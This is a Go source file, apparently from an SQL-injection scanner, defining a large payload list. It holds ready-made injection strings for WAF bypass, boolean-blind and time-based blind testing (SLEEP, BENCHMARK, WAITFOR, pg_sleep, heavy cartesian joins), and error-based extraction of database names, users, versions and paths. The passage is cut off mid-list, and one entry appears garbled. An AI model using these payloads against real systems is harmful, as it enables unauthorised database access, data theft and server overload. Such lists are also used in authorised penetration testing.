package payloads

var Mega = PayloadGroup{
	DBMS: "Mega",
	Payloads: []Payload{
		// ═════════════════════════════════════════════════════
		// WAF BYPASS — COMMENT/SPACE OBFUSCATION (100+)
		// ═════════════════════════════════════════════════════
		{Type: "bypass", Content: "'/**/OR/**/1=1--"},
		{Type: "bypass", Content: "'/**/AND/**/1=1--"},
		{Type: "bypass", Content: "'/**/UNION/**/SELECT/**/1,2--"},
		{Type: "bypass", Content: "'/**/UNION/**/ALL/**/SELECT/**/1,2--"},
		{Type: "bypass", Content: "'%0aOR%0a1=1--"},
		{Type: "bypass", Content: "'%0aAND%0a1=1--"},
		{Type: "bypass", Content: "'%0aUNION%0aSELECT%0a1,2--"},
		{Type: "bypass", Content: "'%0d%0aOR%0d%0a1=1--"},
		{Type: "bypass", Content: "'%09OR%091=1--"},
		{Type: "bypass", Content: "'%09AND%091=1--"},
		{Type: "bypass", Content: "'%09UNION%09SELECT%091,2--"},
		{Type: "bypass", Content: "'%0bOR%0b1=1--"},
		{Type: "bypass", Content: "'%0cOR%0c1=1--"},
		{Type: "bypass", Content: "'%a0OR%a01=1--"},
		{Type: "bypass", Content: "'/**/OR/**/1=1#"},
		{Type: "bypass", Content: "'/**/AND/**/1=1#"},
		{Type: "bypass", Content: "'+OR+1=1--"},
		{Type: "bypass", Content: "'+AND+1=1--"},
		{Type: "bypass", Content: "'+UNION+SELECT+1,2--"},
		{Type: "bypass", Content: "'/**/UNION/**/SELECT/**/NULL,NULL,NULL--"},
		{Type: "bypass", Content: "'%00OR%001=1--"},
		{Type: "bypass", Content: "'%00AND%001=1--"},
		{Type: "bypass", Content: "'OR%001=1--"},
		{Type: "bypass", Content: "'AND%001=1--"},
		{Type: "bypass", Content: "'%00'OR%00'1%00=%001--"},
		{Type: "bypass", Content: "'%2500OR%25001=1--"},
		{Type: "bypass", Content: "'/*!30000OR*/1=1--"},
		{Type: "bypass", Content: "'/*!40000OR*/1=1--"},
		{Type: "bypass", Content: "'/*!50000OR*/1=1--"},
		{Type: "bypass", Content: "'/*!80000OR*/1=1--"},
		{Type: "bypass", Content: "'/*!12345OR*/1=1--"},
		{Type: "bypass", Content: "'/*!30000AND*/1=1--"},
		{Type: "bypass", Content: "'/*!40000AND*/1=1--"},
		{Type: "bypass", Content: "'/*!50000AND*/1=1--"},
		{Type: "bypass", Content: "'/*!80000AND*/1=1--"},
		{Type: "bypass", Content: "'/*!12345AND*/1=1--"},
		{Type: "bypass", Content: "'/*!30000UNION*//*!30000SELECT*/1,2--"},
		{Type: "bypass", Content: "'/*!40000UNION*//*!40000SELECT*/1,2--"},
		{Type: "bypass", Content: "'/*!50000UNION*//*!50000SELECT*/1,2--"},
		{Type: "bypass", Content: "'/*!80000UNION*//*!80000SELECT*/1,2--"},
		{Type: "bypass", Content: "'/*!12345UNION*//*!12345SELECT*/1,2--"},
		{Type: "bypass", Content: "'%252f*%252fOR%252f*%252f1=1--"},
		{Type: "bypass", Content: "'%252f*%252fAND%252f*%252f1=1--"},
		{Type: "bypass", Content: "'%252f*%252fUNION%252f*%252fSELECT%252f*%252f1,2--"},
		{Type: "bypass", Content: "'%2f**%2fOR%2f**%2f1=1--"},
		{Type: "bypass", Content: "'%2f**%2fAND%2f**%2f1=1--"},
		{Type: "bypass", Content: "'%2f**%2fUNION%2f**%2fSELECT%2f**%2f1,2--"},
		{Type: "bypass", Content: "'%23%0aOR%23%0a1=1--"},
		{Type: "bypass", Content: "'%23%0aAND%23%0a1=1--"},
		{Type: "bypass", Content: "'%23%0aUNION%23%0aSELECT%23%0a1,2--"},
		{Type: "bypass", Content: "'%2d%2d%0aOR%2d%2d%0a1=1--"},
		{Type: "bypass", Content: "'%2d%2d%0aAND%2d%2d%0a1=1--"},
		{Type: "bypass", Content: "'--%0aOR 1=1--"},
		{Type: "bypass", Content: "'--%0aAND 1=1--"},
		{Type: "bypass", Content: "'--%0aUNION SELECT 1,2--"},
		{Type: "bypass", Content: "'#%0aOR 1=1--"},
		{Type: "bypass", Content: "'#%0aAND 1=1--"},
		{Type: "bypass", Content: "'#%0aUNION SELECT 1,2--"},
		{Type: "bypass", Content: "'/**/OR/**/1=1/**/--"},
		{Type: "bypass", Content: "'/**/AND/**/1=1/**/--"},
		{Type: "bypass", Content: "'/**/UNION/**/SELECT/**/1,2/**/--"},
		{Type: "bypass", Content: "'/**/OR+1=1--"},
		{Type: "bypass", Content: "'/**/AND+1=1--"},
		{Type: "bypass", Content: "'OR+1=1+--+"},
		{Type: "bypass", Content: "'AND+1=1+--+"},
		{Type: "bypass", Content: "'OR+1=1%00--"},
		{Type: "bypass", Content: "'AND+1=1%00--"},
		{Type: "bypass", Content: "'OR+1=1--%00"},
		{Type: "bypass", Content: "'AND+1=1--%00"},
		{Type: "bypass", Content: "'OR 1=1-- "},
		{Type: "bypass", Content: "'AND 1=1-- "},
		{Type: "bypass", Content: "'OR 1=1--+"},
		{Type: "bypass", Content: "'AND 1=1--+"},
		{Type: "bypass", Content: "'OR 1=1-- -"},
		{Type: "bypass", Content: "'AND 1=1-- -"},
		{Type: "bypass", Content: "' OR 1=1 --%09"},
		{Type: "bypass", Content: "' AND 1=1 --%09"},
		{Type: "bypass", Content: "' OR 1=1 --%0d"},
		{Type: "bypass", Content: "' AND 1=1 --%0d"},
		{Type: "bypass", Content: "'/*!OR*/1=1--"},
		{Type: "bypass", Content: "'/*!AND*/1=1--"},
		{Type: "bypass", Content: "'/*!UNION*//*!SELECT*/1,2--"},
		{Type: "bypass", Content: "'/*!50000U*//*!50000N*//*!50000I*//*!50000O*//*!50000N*//*!50000S*//*!50000E*//*!50000L*//*!50000E*//*!50000C*//*!50000T*/1,2--"},
		{Type: "bypass", Content: "' U/**/N/**/I/**/O/**/N S/**/E/**/L/**/E/**/C/**/T 1,2--"},
		{Type: "bypass", Content: "'%55NION%53ELECT 1,2--"},
		{Type: "bypass", Content: "'%55nion%53elect 1,2--"},
		{Type: "bypass", Content: "'UNION DISTINCT SELECT 1,2--"},
		{Type: "bypass", Content: "'UNION ALL SELECT 1,2--"},
		{Type: "bypass", Content: "'UNION/*!ALL*/SELECT 1,2--"},
		{Type: "bypass", Content: "'UNION/**/ALL/**/SELECT 1,2--"},
		{Type: "bypass", Content: "'UNION%23foo%0aSELECT 1,2--"},
		{Type: "bypass", Content: "'UNION%23%0aALL%23%0aSELECT 1,2--"},
		{Type: "bypass", Content: "'/*!UNION*//*!ALL*//*!SELECT*/1,2--"},
		{Type: "bypass", Content: "'/*!50000UNION*//*!50000ALL*//*!50000SELECT*/1,2--"},
		{Type: "bypass", Content: "'%26%26 1=1--"},
		{Type: "bypass", Content: "'%7c%7c 1=1--"},
		{Type: "bypass", Content: "'%26%261=1--"},
		{Type: "bypass", Content: "'%7c%7c1=1--"},
		{Type: "bypass", Content: "'||1=1--"},
		{Type: "bypass", Content: "'&&1=1--"},
		{Type: "bypass", Content: "'%26%261=1--"},
		{Type: "bypass", Content: "'%26%26%201=1--"},
		{Type: "bypass", Content: "'||1=1#"},
		{Type: "bypass", Content: "'&&1=1#"},
		{Type: "bypass", Content: "'||1=1-- -"},
		{Type: "bypass", Content: "'&&1=1-- -"},
		{Type: "bypass", Content: "'%26&1=1--"},
		{Type: "bypass", Content: "'&|1=1--"},
		{Type: "bypass", Content: "'|&1=1--"},
		{Type: "bypass", Content: "'^1=1--"},
		{Type: "bypass", Content: "'|1=1--"},
		{Type: "bypass", Content: "'%7c1=1--"},
		{Type: "bypass", Content: "'%26%26'1'='1"},
		{Type: "bypass", Content: "'%7c%7c'1'='1"},
		{Type: "bypass", Content: "'\"/**/OR/**/1=1--"},
		{Type: "bypass", Content: "'\"/**/AND/**/1=1--"},
		{Type: "bypass", Content: "\"/**/OR/**/1=1--"},
		{Type: "bypass", Content: "\"/**/AND/**/1=1--"},
		{Type: "bypass", Content: "\\'OR 1=1--"},
		{Type: "bypass", Content: "\\'AND 1=1--"},
		{Type: "bypass", Content: "\\'UNION SELECT 1,2--"},
		{Type: "bypass", Content: "' OR 'a'||'b'||'c'--"},
		{Type: "bypass", Content: "' OR CONCAT('a','b','c')--"},
		{Type: "bypass", Content: "'/*!30000--*/OR 1=1--"},
		{Type: "bypass", Content: "'/*!30000--*/AND 1=1--"},
		{Type: "bypass", Content: "'/*!50000--*/OR 1=1--"},
		{Type: "bypass", Content: "'/*!50000--*/AND 1=1--"},
		{Type: "bypass", Content: "'OR+1=1%23"},
		{Type: "bypass", Content: "'AND+1=1%23"},
		{Type: "bypass", Content: "'OR 1=1%23"},
		{Type: "bypass", Content: "'AND 1=1%23"},
		{Type: "bypass", Content: "'%23%0d%0aOR 1=1--"},
		{Type: "bypass", Content: "'%23%0d%0aAND 1=1--"},
		{Type: "bypass", Content: "'%23%0d%0aUNION%23%0d%0aSELECT%23%0d%0a1,2--"},
		{Type: "bypass", Content: "'--+OR 1=1--"},
		{Type: "bypass", Content: "'--+AND 1=1--"},
		{Type: "bypass", Content: "'--+UNION SELECT 1,2--"},
		{Type: "bypass", Content: "1' OR 1=1 SELECT * FROM users--"},
		{Type: "bypass", Content: "1' AND 1=1 SELECT * FROM users--"},

		// ═════════════════════════════════════════════════════
		// BOOLEAN BLIND — ADVANCED VARIATIONS (100+)
		// ═════════════════════════════════════════════════════
		{Type: "boolean", Content: "' AND 'a'='a", Expected: "true"},
		{Type: "boolean", Content: "' AND 'a'='b", Expected: "false"},
		{Type: "boolean", Content: "' AND 'abc'='abc", Expected: "true"},
		{Type: "boolean", Content: "' AND 'abc'='def", Expected: "false"},
		{Type: "boolean", Content: "' AND 2=2", Expected: "true"},
		{Type: "boolean", Content: "' AND 2=3", Expected: "false"},
		{Type: "boolean", Content: "' AND 99=99", Expected: "true"},
		{Type: "boolean", Content: "' AND 99=100", Expected: "false"},
		{Type: "boolean", Content: "' AND -1=-1", Expected: "true"},
		{Type: "boolean", Content: "' AND -1=-2", Expected: "false"},
		{Type: "boolean", Content: "' AND 0x41=0x41", Expected: "true"},
		{Type: "boolean", Content: "' AND 0x41=0x42", Expected: "false"},
		{Type: "boolean", Content: "' AND 1=1 AND '1'='1", Expected: "true"},
		{Type: "boolean", Content: "' AND 1=2 AND '1'='1", Expected: "false"},
		{Type: "boolean", Content: "' AND '1'='1' AND 1=1", Expected: "true"},
		{Type: "boolean", Content: "' AND '1'='2' AND 1=1", Expected: "false"},
		{Type: "boolean", Content: "' AND (1=1)", Expected: "true"},
		{Type: "boolean", Content: "' AND (1=2)", Expected: "false"},
		{Type: "boolean", Content: "' AND ((1=1))", Expected: "true"},
		{Type: "boolean", Content: "' AND ((1=2))", Expected: "false"},
		{Type: "boolean", Content: "' AND (((1=1)))", Expected: "true"},
		{Type: "boolean", Content: "' AND (((1=2)))", Expected: "false"},
		{Type: "boolean", Content: "' AND 1=1 UNION SELECT 1,2--", Expected: "true"},
		{Type: "boolean", Content: "' AND 1=2 UNION SELECT 1,2--", Expected: "false"},
		{Type: "boolean", Content: "' AND 1=1 INTO @a--", Expected: "true"},
		{Type: "boolean", Content: "' AND 1=2 INTO @a--", Expected: "false"},
		{Type: "boolean", Content: "' AND (SELECT 1)=1", Expected: "true"},
		{Type: "boolean", Content: "' AND (SELECT 1)=2", Expected: "false"},
		{Type: "boolean", Content: "' AND (SELECT 'a')='a'", Expected: "true"},
		{Type: "boolean", Content: "' AND (SELECT 'a')='b'", Expected: "false"},
		{Type: "boolean", Content: "' AND EXISTS(SELECT 1)", Expected: "true"},
		{Type: "boolean", Content: "' AND NOT EXISTS(SELECT 1)", Expected: "false"},
		{Type: "boolean", Content: "' AND 1 IN (1,2,3)", Expected: "true"},
		{Type: "boolean", Content: "' AND 1 IN (2,3,4)", Expected: "false"},
		{Type: "boolean", Content: "' AND 'a' IN ('a','b')", Expected: "true"},
		{Type: "boolean", Content: "' AND 'a' IN ('b','c')", Expected: "false"},
		{Type: "boolean", Content: "' AND 1 BETWEEN 0 AND 2", Expected: "true"},
		{Type: "boolean", Content: "' AND 1 BETWEEN 2 AND 3", Expected: "false"},
		{Type: "boolean", Content: "' AND 'b' BETWEEN 'a' AND 'c'", Expected: "true"},
		{Type: "boolean", Content: "' AND 'b' BETWEEN 'c' AND 'd'", Expected: "false"},
		{Type: "boolean", Content: "' AND 1 IS NOT NULL", Expected: "true"},
		{Type: "boolean", Content: "' AND 1 IS NULL", Expected: "false"},
		{Type: "boolean", Content: "' AND 'a' IS NOT NULL", Expected: "true"},
		{Type: "boolean", Content: "' AND 'a' IS NULL", Expected: "false"},
		{Type: "boolean", Content: "' AND 1=1 OR '1'='1'", Expected: "true"},
		{Type: "boolean", Content: "' AND 1=2 OR '1'='1'", Expected: "true"},
		{Type: "boolean", Content: "' AND 1=1 OR '1'='2'", Expected: "true"},
		{Type: "boolean", Content: "' AND 1=2 OR '1'='2'", Expected: "false"},
		{Type: "boolean", Content: "' AND (1=1 OR 1=1)", Expected: "true"},
		{Type: "boolean", Content: "' AND (1=2 OR 1=2)", Expected: "false"},
		{Type: "boolean", Content: "' AND (1=1 AND 1=1)", Expected: "true"},
		{Type: "boolean", Content: "' AND (1=1 AND 1=2)", Expected: "false"},
		{Type: "boolean", Content: "' AND NOT 1=2", Expected: "true"},
		{Type: "boolean", Content: "' AND NOT 1=1", Expected: "false"},
		{Type: "boolean", Content: "' AND 'abc' LIKE 'a%'", Expected: "true"},
		{Type: "boolean", Content: "' AND 'abc' LIKE 'd%'", Expected: "false"},
		{Type: "boolean", Content: "' AND 5&1=1", Expected: "true"},
		{Type: "boolean", Content: "' AND 5&2=0", Expected: "true"},
		{Type: "boolean", Content: "' AND 5&2=2", Expected: "true"},
		{Type: "boolean", Content: "' AND 5&1=0", Expected: "false"},
		{Type: "boolean", Content: "' AND 5|1=5", Expected: "true"},
		{Type: "boolean", Content: "' AND 5|1=6", Expected: "false"},
		{Type: "boolean", Content: "' AND 5^0=5", Expected: "true"},
		{Type: "boolean", Content: "' AND 5^0=6", Expected: "false"},
		{Type: "boolean", Content: "' AND ~1=-2", Expected: "true"},
		{Type: "boolean", Content: "' AND ~1=-3", Expected: "false"},
		{Type: "boolean", Content: "' AND LEAST(1,2)=1", Expected: "true"},
		{Type: "boolean", Content: "' AND LEAST(1,2)=2", Expected: "false"},
		{Type: "boolean", Content: "' AND GREATEST(1,2)=2", Expected: "true"},
		{Type: "boolean", Content: "' AND GREATEST(1,2)=1", Expected: "false"},
		{Type: "boolean", Content: "' AND COALESCE(1,2)=1", Expected: "true"},
		{Type: "boolean", Content: "' AND COALESCE(NULL,1)=1", Expected: "true"},
		{Type: "boolean", Content: "' AND COALESCE(NULL,NULL)=0", Expected: "false"},
		{Type: "boolean", Content: "' AND IFNULL(1,2)=1", Expected: "true"},
		{Type: "boolean", Content: "' AND IFNULL(NULL,1)=1", Expected: "true"},
		{Type: "boolean", Content: "' AND NULLIF(1,2)=1", Expected: "true"},
		{Type: "boolean", Content: "' AND NULLIF(1,1)=0", Expected: "false"},
		{Type: "boolean", Content: "' AND ASCII('a')=97", Expected: "true"},
		{Type: "boolean", Content: "' AND ASCII('a')=65", Expected: "false"},
		{Type: "boolean", Content: "' AND CHAR(97)='a'", Expected: "true"},
		{Type: "boolean", Content: "' AND CHAR(65)='A'", Expected: "true"},
		{Type: "boolean", Content: "' AND LENGTH('abc')=3", Expected: "true"},
		{Type: "boolean", Content: "' AND LENGTH('abc')=2", Expected: "false"},
		{Type: "boolean", Content: "' AND SUBSTR('abc',1,1)='a'", Expected: "true"},
		{Type: "boolean", Content: "' AND SUBSTR('abc',1,1)='b'", Expected: "false"},
		{Type: "boolean", Content: "' AND ORD('a')=97", Expected: "true"},
		{Type: "boolean", Content: "' AND ORD('a')=65", Expected: "false"},

		// ═════════════════════════════════════════════════════
		// TIME-BASED BLIND — HEAVY / CARTESIAN (150+)
		// ═════════════════════════════════════════════════════
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM information_schema.columns A, information_schema.columns B, information_schema.columns C)--"},
		{Type: "time", Content: "\" AND (SELECT COUNT(*) FROM information_schema.columns A, information_schema.columns B, information_schema.columns C)--"},
		{Type: "time", Content: "') AND (SELECT COUNT(*) FROM information_schema.columns A, information_schema.columns B, information_schema.columns C)--"},
		{Type: "time", Content: "\") AND (SELECT COUNT(*) FROM information_schema.columns A, information_schema.columns B, information_schema.columns C)--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM information_schema.tables A, information_schema.tables B, information_schema.tables C)--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM information_schema.tables A, information_schema.tables B)--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM information_schema.columns A, information_schema.columns B)--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM information_schema.routines A, information_schema.routines B)--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM information_schema.views A, information_schema.views B)--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM information_schema.parameters A, information_schema.parameters B)--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM information_schema.table_constraints A, information_schema.table_constraints B)--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM (SELECT 1)a JOIN (SELECT 1)b JOIN (SELECT 1)c JOIN (SELECT 1)d JOIN (SELECT 1)e JOIN (SELECT 1)f JOIN (SELECT 1)g)--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM (SELECT 1)a JOIN (SELECT 1)b JOIN (SELECT 1)c JOIN (SELECT 1)d JOIN (SELECT 1)e)--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM (SELECT 1 UNION ALL SELECT 2 UNION ALL SELECT 3 UNION ALL SELECT 4 UNION ALL SELECT 5 UNION ALL SELECT 6 UNION ALL SELECT 7 UNION ALL SELECT 8 UNION ALL SELECT 9 UNION ALL SELECT 10)a JOIN (SELECT 1 UNION ALL SELECT 2 UNION ALL SELECT 3 UNION ALL SELECT 4 UNION ALL SELECT 5)b)--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM generate_series(1,1000000))>0--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM generate_series(1,100000000))>0--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM generate_series(1,10000000) a, generate_series(1,10000000) b)>0--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM system_range(1,1000000))>0--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM system_range(1,10000000))>0--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM seq_0_to_1000000)>0--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM seq_0_to_10000000)>0--"},
		{Type: "time", Content: "' AND BENCHMARK(5000000,MD5('test'))--"},
		{Type: "time", Content: "' AND BENCHMARK(10000000,MD5('test'))--"},
		{Type: "time", Content: "' AND BENCHMARK(20000000,SHA1('test'))--"},
		{Type: "time", Content: "' AND BENCHMARK(5000000,AES_ENCRYPT('test','key'))--"},
		{Type: "time", Content: "' AND BENCHMARK(10000000,SHA2('test',256))--"},
		{Type: "time", Content: "' AND BENCHMARK(50000000,1)--"},
		{Type: "time", Content: "\" AND BENCHMARK(5000000,MD5('test'))--"},
		{Type: "time", Content: "') AND BENCHMARK(5000000,MD5('test'))--"},
		{Type: "time", Content: "\") AND BENCHMARK(5000000,MD5('test'))--"},
		{Type: "time", Content: "' AND SLEEP(3)--"},
		{Type: "time", Content: "' AND SLEEP(4)--"},
		{Type: "time", Content: "' AND SLEEP(6)--"},
		{Type: "time", Content: "' AND SLEEP(7)--"},
		{Type: "time", Content: "' AND SLEEP(8)--"},
		{Type: "time", Content: "' AND SLEEP(9)--"},
		{Type: "time", Content: "' AND SLEEP(10)--"},
		{Type: "time", Content: "' AND SLEEP(15)--"},
		{Type: "time", Content: "\" AND SLEEP(5)--"},
		{Type: "time", Content: "\" AND SLEEP(10)--"},
		{Type: "time", Content: "') AND SLEEP(5)--"},
		{Type: "time", Content: "') AND SLEEP(10)--"},
		{Type: "time", Content: "1' AND SLEEP(5)--"},
		{Type: "time", Content: "1' AND SLEEP(10)--"},
		{Type: "time", Content: "1\" AND SLEEP(5)--"},
		{Type: "time", Content: "1\" AND SLEEP(10)--"},
		{Type: "time", Content: "' OR SLEEP(3)--"},
		{Type: "time", Content: "' OR SLEEP(4)--"},
		{Type: "time", Content: "' OR SLEEP(6)--"},
		{Type: "time", Content: "' OR SLEEP(7)--"},
		{Type: "time", Content: "' OR SLEEP(8)--"},
		{Type: "time", Content: "' OR SLEEP(9)--"},
		{Type: "time", Content: "' OR SLEEP(15)--"},
		{Type: "time", Content: "1' OR SLEEP(3)--"},
		{Type: "time", Content: "1' OR SLEEP(4)--"},
		{Type: "time", Content: "1' OR SLEEP(6)--"},
		{Type: "time", Content: "1' OR SLEEP(7)--"},
		{Type: "time", Content: "1' OR SLEEP(8)--"},
		{Type: "time", Content: "1' OR SLEEP(9)--"},
		{Type: "time", Content: "1' OR SLEEP(15)--"},
		{Type: "time", Content: "' OR SLEEP(10)#"},
		{Type: "time", Content: "' OR SLEEP(10)/**/--"},
		{Type: "time", Content: "' OR SLEEP(10)--%00"},
		{Type: "time", Content: "' OR SLEEP(10)%00--"},
		{Type: "time", Content: "' OR (SELECT SLEEP(10))--"},
		{Type: "time", Content: "' OR (SELECT SLEEP(10) FROM DUAL)--"},
		{Type: "time", Content: "' OR (SELECT SLEEP(10) FROM mysql.user)--"},
		{Type: "time", Content: "' OR (SELECT SLEEP(10) FROM information_schema.tables)--"},
		{Type: "time", Content: "' OR (SELECT COUNT(*) FROM (SELECT SLEEP(10))a)--"},
		{Type: "time", Content: "' OR (SELECT 1 WHERE SLEEP(10))--"},
		{Type: "time", Content: "' OR (SELECT 1 FROM DUAL WHERE SLEEP(10))--"},
		{Type: "time", Content: "' WAITFOR DELAY '0:0:5'--"},
		{Type: "time", Content: "' WAITFOR DELAY '0:0:10'--"},
		{Type: "time", Content: "\" WAITFOR DELAY '0:0:5'--"},
		{Type: "time", Content: "\" WAITFOR DELAY '0:0:10'--"},
		{Type: "time", Content: "') WAITFOR DELAY '0:0:5'--"},
		{Type: "time", Content: "') WAITFOR DELAY '0:0:10'--"},
		{Type: "time", Content: "\") WAITFOR DELAY '0:0:5'--"},
		{Type: "time", Content: "\") WAITFOR DELAY '0:0:10'--"},
		{Type: "time", Content: "1' WAITFOR DELAY '0:0:5'--"},
		{Type: "time", Content: "1' WAITFOR DELAY '0:0:10'--"},
		{Type: "time", Content: "' WAITFOR DELAY '00:00:05'--"},
		{Type: "time", Content: "' WAITFOR DELAY '00:00:10'--"},
		{Type: "time", Content: "' OR pg_sleep(5)--"},
		{Type: "time", Content: "' OR pg_sleep(10)--"},
		{Type: "time", Content: "\" OR pg_sleep(5)--"},
		{Type: "time", Content: "\" OR pg_sleep(10)--"},
		{Type: "time", Content: "') OR pg_sleep(5)--"},
		{Type: "time", Content: "') OR pg_sleep(10)--"},
		{Type: "time", Content: "' OR (SELECT pg_sleep(5))--"},
		{Type: "time", Content: "' OR (SELECT pg_sleep(10))--"},
		{Type: "time", Content: "' OR (SELECT COUNT(*) FROM pg_sleep(5))--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM generate_series(1,100000000) a, generate_series(1,100000) b)>0--"},
		{Type: "time", Content: "' OR (SELECT COUNT(*) FROM generate_series(1,10000000) a, generate_series(1,10000) b)>0--"},
		{Type: "time", Content: "' AND DBMS_LOCK.SLEEP(5)--"},
		{Type: "time", Content: "' AND DBMS_LOCK.SLEEP(10)--"},
		{Type: "time", Content: "\" AND DBMS_LOCK.SLEEP(5)--"},
		{Type: "time", Content: "') AND DBMS_LOCK.SLEEP(5)--"},
		{Type: "time", Content: "' OR DBMS_LOCK.SLEEP(5)--"},
		{Type: "time", Content: "' OR DBMS_LOCK.SLEEP(10)--"},
		{Type: "time", Content: "' AND DBMS_PIPE.RECEIVE_MESSAGE('x',5)--"},
		{Type: "time", Content: "' AND DBMS_PIPE.RECEIVE_MESSAGE('x',10)--"},
		{Type: "time", Content: "' OR DBMS_PIPE.RECEIVE_MESSAGE('x',5)--"},
		{Type: "time", Content: "' OR DBMS_PIPE.RECEIVE_MESSAGE('x',10)--"},
		{Type: "time", Content: "' AND HTTpDBMS_LOCK.SLEEP(5)--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM all_objects A, all_objects B, all_objects C)--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM all_tables A, all_tables B, all_tables C)--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM all_views A, all_views B)--"},
		{Type: "time", Content: "' AND (SELECT COUNT(*) FROM dba_objects A, dba_objects B)--"},
		{Type: "time", Content: "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT SLEEP(3)),FLOOR(RAND()*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)--"},
		{Type: "time", Content: "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT SLEEP(5)),FLOOR(RAND()*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)--"},
		{Type: "time", Content: "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT SLEEP(10)),FLOOR(RAND()*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)--"},
		{Type: "time", Content: "' AND IF(1=1,SLEEP(5),0)--"},
		{Type: "time", Content: "' AND IF(1=1,SLEEP(10),0)--"},
		{Type: "time", Content: "' AND IIF(1=1,pg_sleep(5),0)--"},
		{Type: "time", Content: "' AND IIF(1=1,pg_sleep(10),0)--"},
		{Type: "time", Content: "' AND CASE WHEN 1=1 THEN SLEEP(5) ELSE 0 END--"},
		{Type: "time", Content: "' AND CASE WHEN 1=1 THEN SLEEP(10) ELSE 0 END--"},
		{Type: "time", Content: "' AND CASE WHEN 1=1 THEN pg_sleep(5) ELSE 0 END--"},
		{Type: "time", Content: "' AND CASE WHEN 1=1 THEN pg_sleep(10) ELSE 0 END--"},

		// ═════════════════════════════════════════════════════
		// ERROR-BASED — CROSS-DBMS (70+)
		// ═════════════════════════════════════════════════════
		{Type: "error", Content: "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),FLOOR(RAND()*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT user()),FLOOR(RAND()*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT version()),FLOOR(RAND()*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT @@datadir),FLOOR(RAND()*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT @@basedir),FLOOR(RAND()*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT @@hostname),FLOOR(RAND()*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(0x3a,(SELECT user()),0x3a,FLOOR(RAND()*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(0x3a,(SELECT database()),0x3a,FLOOR(RAND()*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(0x3a,(SELECT version()),0x3a,FLOOR(RAND()*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM (SELECT 1,2,3,4,5,COUNT(*),CONCAT((SELECT user()),FLOOR(RAND()*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)--"},
		{Type: "error", Content: "' AND (SELECT 1 FROM (SELECT 1,2,3,4,5,6,7,COUNT(*),CONCAT((SELECT database()),FLOOR(RAND()*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)--"},
		{Type: "error", Content: "' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT database())))--"},
		{Type: "error", Content: "' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT user())))--"},
		{Type: "error", Content: "' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version())))--"},
		{Type: "error", Content: "' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT @@datadir)))--"},
		{Type: "error", Content: "' AND UPDATEXML(1,CONCAT(0x7e,(SELECT database())),1)--"},
		{Type: "error", Content: "' AND UPDATEXML(1,CONCAT(0x7e,(SELECT user())),1)--"},
		{Type: "error", Content: "' AND UPDATEXML(1,CONCAT(0x7e,(SELECT version())),1)--"},
		{Type: "error", Content: "\" AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT database())))--"},
		{Type: "error", Content: "\" AND UPDATEXML(1,CONCAT(0x7e,(SELECT database())),1)--"},
		{Type: "error", Content: "' AND EXTRACTVALUE(1,CONCAT(0x5e,(SELECT database())))--"},
		{Type: "error", Content: "' AND UPDATEXML(1,CONCAT(0x5e,(SELECT database())),1)--"},
